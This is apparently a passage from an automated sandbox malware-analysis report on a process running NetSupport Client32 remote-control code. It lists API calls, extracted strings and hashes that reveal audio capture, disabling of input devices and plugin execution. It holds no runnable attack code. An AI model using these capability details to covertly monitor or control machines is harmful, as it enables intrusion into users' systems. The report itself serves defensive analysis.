                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                                      • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                                      • API String ID: 2789700732-770455996
                                                                                                      • Opcode ID: d5666059194125e5e798e1ea1a571cdf665601eefd1acf21ad263d58b3d84359
                                                                                                      • Instruction ID: d9229358f4933b228272336fa2bf33a0883a331572b372d30b0232039735f129
                                                                                                      • Opcode Fuzzy Hash: d5666059194125e5e798e1ea1a571cdf665601eefd1acf21ad263d58b3d84359
                                                                                                      • Instruction Fuzzy Hash: 5C816975A00609AFD728DBB5C990EABF7F9BF8C304F00451DE6A697680DA75F801CB60
                                                                                                      APIs
                                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                        • Part of subcall function 110ED1F0: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105E76C,?,00000000,?,00000000,75BF8400,?,?,1105E76C,80000001), ref: 110ED21B
                                                                                                      • GetTickCount.KERNEL32 ref: 110FF4DB
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 110FF4E8
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 110FF4F5
                                                                                                      • GetTickCount.KERNEL32 ref: 110FF4FB
                                                                                                      • wsprintfA.USER32 ref: 110FF5BE
                                                                                                      • _memset.LIBCMT ref: 110FF5CF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CountTick$CloseCreateHandleObjectSingleWait__wcstoi64_memsetwsprintf
                                                                                                      • String ID: "%s" %s %s HID*$%s HID*$Client$D$DisableHIDCode$DisableHidDevices(%d)$DisabledHID$Error %d opening key$Error creating process %s$Software\NetSupport Ltd\Client32$Trace$TraceFile$Waited %d ms for last devcon$_debug$nsdevcon.exe$nsdevcon64.exe
                                                                                                      • API String ID: 137837830-2801557662
                                                                                                      • Opcode ID: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                                      • Instruction ID: a11abc6b97969388e485db2e6a8e88b8a5e3b39e7edf5af597a12920a36432c8
                                                                                                      • Opcode Fuzzy Hash: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                                      • Instruction Fuzzy Hash: 9471EC75E4421ABBEB10DBA1DC89FEEF774EB08708F10419DED14A6181EB306944CBA6
                                                                                                      APIs
                                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                      • wsprintfA.USER32 ref: 110EB1B8
                                                                                                      • GetTickCount.KERNEL32 ref: 110EB212
                                                                                                      • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB226
                                                                                                      • GetTickCount.KERNEL32 ref: 110EB22E
                                                                                                      • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB276
                                                                                                      • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000001), ref: 110EB2A8
                                                                                                      • SetEvent.KERNEL32(00000000,?,00000001), ref: 110EB2B5
                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000001), ref: 110EB2BC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                                      • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                                      • API String ID: 3451743168-2289091950
                                                                                                      • Opcode ID: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                                      • Instruction ID: f1114c107ee76d929ad16cd328bd8b6b93bc0bc6479e919ac6bcab8c7865c9c3
                                                                                                      • Opcode Fuzzy Hash: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                                      • Instruction Fuzzy Hash: D441A675A012199FD724DFA5DC44FAEF7B8EF48319F0085AEE91AA7240D631A940CFB1
                                                                                                      APIs
                                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                      • _malloc.LIBCMT ref: 1100B366
                                                                                                        • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                        • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                        • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                        • Part of subcall function 1100AC40: EnterCriticalSection.KERNEL32(000000FF,4764EAAA,?,00000000,00000000), ref: 1100AC84
                                                                                                        • Part of subcall function 1100AC40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACA2
                                                                                                        • Part of subcall function 1100AC40: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ACEE
                                                                                                        • Part of subcall function 1100AC40: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD35
                                                                                                        • Part of subcall function 1100AC40: CloseHandle.KERNEL32(00000000), ref: 1100AD3C
                                                                                                        • Part of subcall function 1100AC40: _free.LIBCMT ref: 1100AD53
                                                                                                        • Part of subcall function 1100AC40: FreeLibrary.KERNEL32(?), ref: 1100AD6B
                                                                                                        • Part of subcall function 1100AC40: LeaveCriticalSection.KERNEL32(?), ref: 1100AD75
                                                                                                      • EnterCriticalSection.KERNEL32(1100CA5A,Audio,DisableSounds,00000000,00000000,4764EAAA,?,1100CA4A,00000000,?,1100CA4A,?), ref: 1100B39B
                                                                                                      • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA4A,?), ref: 1100B3B8
                                                                                                      • _calloc.LIBCMT ref: 1100B3E9
                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA4A,?), ref: 1100B40F
                                                                                                      • LeaveCriticalSection.KERNEL32(1100CA5A,?,1100CA4A,?), ref: 1100B449
                                                                                                      • LeaveCriticalSection.KERNEL32(1100CA4A,?,?,1100CA4A,?), ref: 1100B46E
                                                                                                      Strings
                                                                                                      • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B51C
                                                                                                      • Audio, xrefs: 1100B347
                                                                                                      • Vista new pAudioCap=%p, xrefs: 1100B4D3
                                                                                                      • InitCaptureSounds NT6, xrefs: 1100B48E
                                                                                                      • Vista AddAudioCapEvtListener(%p), xrefs: 1100B4F3
                                                                                                      • DisableSounds, xrefs: 1100B342
                                                                                                      • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4C3
                                                                                                      • \\.\NSAudioFilter, xrefs: 1100B3B0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                                      • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                                      • API String ID: 1843377891-2362500394
                                                                                                      • Opcode ID: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                                      • Instruction ID: 3f9b0c4355a442be161718b687c517c7c1a8a488e2b9041c50d9e3709ff29e90
                                                                                                      • Opcode Fuzzy Hash: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                                      • Instruction Fuzzy Hash: 8E51D9B5E0464AAFE704CF74DC80BAEF7A4FB04759F10467AE929A3240E7717550C7A1
                                                                                                      APIs
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      • GetLastError.KERNEL32(?), ref: 1102B331
                                                                                                      • GetLastError.KERNEL32(?), ref: 1102B38E
                                                                                                      • _fgets.LIBCMT ref: 1102B3C0
                                                                                                      • _strtok.LIBCMT ref: 1102B3E8
                                                                                                        • Part of subcall function 11163016: __getptd.LIBCMT ref: 11163034
                                                                                                      • _fgets.LIBCMT ref: 1102B424
                                                                                                      • _strtok.LIBCMT ref: 1102B438
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                                                      • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                      • API String ID: 78526175-1484737611
                                                                                                      • Opcode ID: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                                      • Instruction ID: 83a04ffa2f5f23a923324f4189043cfd8b751997b231b4d3af7dc0cd534076c2
                                                                                                      • Opcode Fuzzy Hash: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                                      • Instruction Fuzzy Hash: 2E81B675D00A1E9BDB10DBA4CC80FEEB7B9AF44309F4440D8E919A7245EA75AB84CF91
                                                                                                      APIs
                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,4764EAAA,00000000,00000000,00000000), ref: 1103119A
                                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                      • EnumWindows.USER32(110301B0,00000001), ref: 11031272
                                                                                                      • EnumWindows.USER32(110301B0,00000000), ref: 110312CC
                                                                                                      • Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 110312DC
                                                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 11031313
                                                                                                        • Part of subcall function 11027E50: _memset.LIBCMT ref: 11027E85
                                                                                                        • Part of subcall function 11027E50: wsprintfA.USER32 ref: 11027EBA
                                                                                                        • Part of subcall function 11027E50: WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EFF
                                                                                                        • Part of subcall function 11027E50: GetExitCodeProcess.KERNEL32(?,?), ref: 11027F13
                                                                                                        • Part of subcall function 11027E50: CloseHandle.KERNEL32(?,00000000), ref: 11027F45
                                                                                                        • Part of subcall function 11027E50: CloseHandle.KERNEL32(?), ref: 11027F4E
                                                                                                      • Sleep.KERNEL32(0000000A,?,?,?,?,?,00000000), ref: 1103132B
                                                                                                      • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 110313E7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                                                                      • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                                                                      • API String ID: 3887438110-1852639040
                                                                                                      • Opcode ID: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                                      • Instruction ID: 68f8b224c7beedd47666692ff363fa6bc3684c9dbb57027410f782db2506f70a
                                                                                                      • Opcode Fuzzy Hash: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                                      • Instruction Fuzzy Hash: 3391D0B5E002299FDB14CF64DC80BEEF7F5AF89308F1441A9D9599B640EB30AE45CB91
                                                                                                      APIs
                                                                                                        • Part of subcall function 1115ADD0: IsIconic.USER32(?), ref: 1115AE77
                                                                                                        • Part of subcall function 1115ADD0: ShowWindow.USER32(?,00000009), ref: 1115AE87
                                                                                                        • Part of subcall function 1115ADD0: BringWindowToTop.USER32(?), ref: 1115AE91
                                                                                                      • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102324D
                                                                                                      • ShowWindow.USER32(?,00000003), ref: 110232D1
                                                                                                      • LoadMenuA.USER32(00000000,000013A3), ref: 110233FB
                                                                                                      • GetSubMenu.USER32(00000000,00000000), ref: 11023409
                                                                                                      • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023429
                                                                                                      • GetDlgItem.USER32(?,000013B2), ref: 1102343C
                                                                                                      • GetWindowRect.USER32(00000000), ref: 11023443
                                                                                                      • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023499
                                                                                                      • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 110234A3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                                      • String ID: AddToJournal$Chat
                                                                                                      • API String ID: 693070851-2976406578
                                                                                                      • Opcode ID: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                                      • Instruction ID: 337dba7d0f02a97e7c7211def3ec221287211942730252afe18814347e7ecccc
                                                                                                      • Opcode Fuzzy Hash: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                                      • Instruction Fuzzy Hash: 87A1F178B04616ABDB09DF74CC85FAEB3E5AB88704F504519EA26DF2C0CF74B9408B65
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 1110534D
                                                                                                      • EnterCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105356
                                                                                                      • GetTickCount.KERNEL32 ref: 1110535C
                                                                                                      • GetTickCount.KERNEL32 ref: 1110538E
                                                                                                      • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105397
                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053B8
                                                                                                      • WriteFile.KERNEL32(00000000,1118C583,?,?,00000000,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF), ref: 111053D0
                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053DD
                                                                                                      • GetTickCount.KERNEL32 ref: 111053EC
                                                                                                      • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053F5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CountTick$Leave$Enter$FileWrite
                                                                                                      • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                      • API String ID: 831250470-625438208
                                                                                                      • Opcode ID: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                                      • Instruction ID: 510883743b079e8f18b7a04972f4ca77f6f871929db96d85a9feff413df15827
                                                                                                      • Opcode Fuzzy Hash: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                                      • Instruction Fuzzy Hash: F521F37AE10228ABDB009F759CC89AEFBADEB8972DB551075FC15CB204D6609C04CBA0
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 11137363
                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11137384
                                                                                                      • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11137394
                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111373B1
                                                                                                      • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111373BD
                                                                                                      • _memset.LIBCMT ref: 111373D7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
